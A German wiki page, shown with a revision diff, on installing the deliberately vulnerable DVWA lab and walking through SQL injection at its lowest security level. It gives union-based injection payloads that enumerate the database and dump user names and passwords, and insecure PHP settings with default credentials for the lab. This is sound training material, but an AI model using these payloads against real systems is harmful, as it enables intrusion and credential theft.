Apache / Php / Mysql: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 1: Zeile 1:
=Test / Simulation unsichere Webanwendung=
+
=DVWA - Damn Vulnerable Web App=
==DVWA - Damn Vulnerable Web App==
+
==Voraussetzungen==
===Voraussetzungen===
 
 
*Apache, Mysql, installiert
 
*Apache, Mysql, installiert
 
  apt-get install apache2 mysql-server  
 
  apt-get install apache2 mysql-server  
Zeile 10: Zeile 9:
 
  apt-get install php5.6 php5.6-mysql php5.6-gd
 
  apt-get install php5.6 php5.6-mysql php5.6-gd
 
  php -v
 
  php -v
===Installation DVWA===
+
==Installation DVWA==
 
*Nach dem Download Entpacken und Verschieben ins DocumentRoot  
 
*Nach dem Download Entpacken und Verschieben ins DocumentRoot  
 
  unzip DVWA-master.zip
 
  unzip DVWA-master.zip
Zeile 45: Zeile 44:
 
   
 
   
 
   
 
   
===SQL Injection mit DVWA===
+
==SQL Injection mit DVWA==
 
*Sicherheitslevel low
 
*Sicherheitslevel low
 
*SQL Injection aufrufen und in Textbox '1' eingeben::
 
*SQL Injection aufrufen und in Textbox '1' eingeben::

Version vom 13. November 2017, 12:08 Uhr

DVWA - Damn Vulnerable Web App

Voraussetzungen

  • Apache, Mysql, installiert
apt-get install apache2 mysql-server 
  • php < 7.0 muss installiert sein
Ubuntu 16.04:
sudo add-apt-repository ppa:ondrej/php
apt-get update
apt-get install php5.6 php5.6-mysql php5.6-gd
php -v

Installation DVWA

  • Nach dem Download Entpacken und Verschieben ins DocumentRoot
unzip DVWA-master.zip
mv DVWA-master /var/www/html/dvwa
  • cd /var/www/html/dvwa/
  • cp config/config.inc.php.dist config/config.inc.php
  • vi config
  • Anpassen der Konfiguration dvwa:
vi config/config.inc.php:
$_DVWA[ 'db_password' ] = 'das_vergebene_passwort';
Falls das Insecure Captcha Modul benutzt werden soll:
$_DVWA[ 'recaptcha_public_key = 
$_DVWA[ 'recaptcha_private_key = 

Die Werte für die beiden Optionen müssen zuerst generiert werden (ein google Account ist Voraussetzung): https://www.google.com/recaptcha/admin/create

  • Anpassen der php Konfiguration:
vi /etc/php/5.6/apache2/php.ini
allow_url_include = on
allow_url_fopen = on
safe_mode = off
magic_quotes_gpc = off (fuer php <= 5.4)
service apache2 restart
  • Anpassen der Verzeichnisrechte:
chown www-data hackable/uploads/
chown www-data external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
Username: admin
Passwort: password

Direkt nach der Installation ist die Anwendung 'sicher' eingestellt. Das Sicherheitslevel kann unter DVWA Security angepasst werden.


SQL Injection mit DVWA

  • Sicherheitslevel low
  • SQL Injection aufrufen und in Textbox '1' eingeben::

Ausgabe von ID, Vorname und Nachname

  • Eingabe von %' or '0'='0 in Textbox

-> Augabe aller User

  • Eingabe von %' or 0=0 union select null, version() # in Textbox

-> Ausgabe der Version ganz unten

  • Eingabe von %' or 0=0 union select null, user() # in Textbox

-> Ausgabe des Db Benutzers der die Abfragen durchführt

  • Eingabe von %' or 0=0 union select null, database() # in Textbox

-> Ausgabe der aktuellen Datenbank

  • Eingabe von %' or 0=0 union select null, table_name from information_schema.tables where table_name like 'user%' # in Textbox

-> Ausgabe aller Tabellen die mit user beginnen

  • %' or 0=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

-> Ausgabe aller Felder in der Tabelle users
0x0a: Zeilenumbruch

  • %' or 0=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

-> Ausgabe der Benutzer und Passwoerter